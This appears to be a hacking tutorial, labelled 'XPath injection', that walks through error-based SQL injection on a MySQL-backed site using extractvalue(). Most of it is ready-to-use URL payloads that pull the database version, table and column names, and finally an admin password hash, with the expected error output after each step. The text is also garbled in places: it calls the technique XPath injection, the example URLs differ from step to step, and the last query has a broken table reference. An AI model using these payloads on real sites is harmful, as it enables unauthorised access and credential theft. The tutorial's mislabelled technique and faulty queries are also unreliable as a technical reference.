XPath Injection (Exploitation)

If the website is Vulnerable to XPath Vulnerability , The Attacker can Inject XPath Element  in a query that uses this language. when  website use client-supplied information to construct an XPath query to get XML data. 

When To Use It? 

 Let us assume we have found a vulnerable site, after ORDER BY we get 7 columns but when we try to *actually* inject it using UNION SELECT it says like "The used SELECT statements have a different number of columns". 

Let  the vulnerable website is www.examplevulnweb.com/ex.php?s= , where ex.php?s= is vulnerable . We'll use extractvalue() ExtractValue() is function in MySQL that extracts a value from an XML string using XPath notation. 

The function takes input in the following form:

ExtractValue(xml_frag, xpath_expr) If the XPath query is syntactically incorrect, we are presented with an error message: XPATH syntax error: 'QueryHere' 

So we can get the version using this query: 
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x3a,version())-- 

We'll get something like this: 
XPATH syntax error: DB Version 

 We'll have to get the tables one by one, like: 
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x7e,(select concat(0x20,table_name) from information_schema.tables limit 0,1)))-- 

The result'd be something like: 
XPATH syntax error: ~ admin 

Then we'll get the columns: 
http://examplevulnweb.com/x.php?x=1 and extractvalue(rand(),concat(0x7e,(select concat(0x20,column_name) from information_schema.columns where table_name=0x61646d696e limit 0,1)))-- 

Result: 

XPATH syntax error: ~ password 

and finally we'll grab the data: 
http://examplevulnweb/ex.php?s and extractvalue(rand(),concat(0x7e,(select password from adminlimit 0,1)))-- 

and the output would be: 

XPATH syntax error: ~ 21232f297a57a5a743894a0e4a801fc3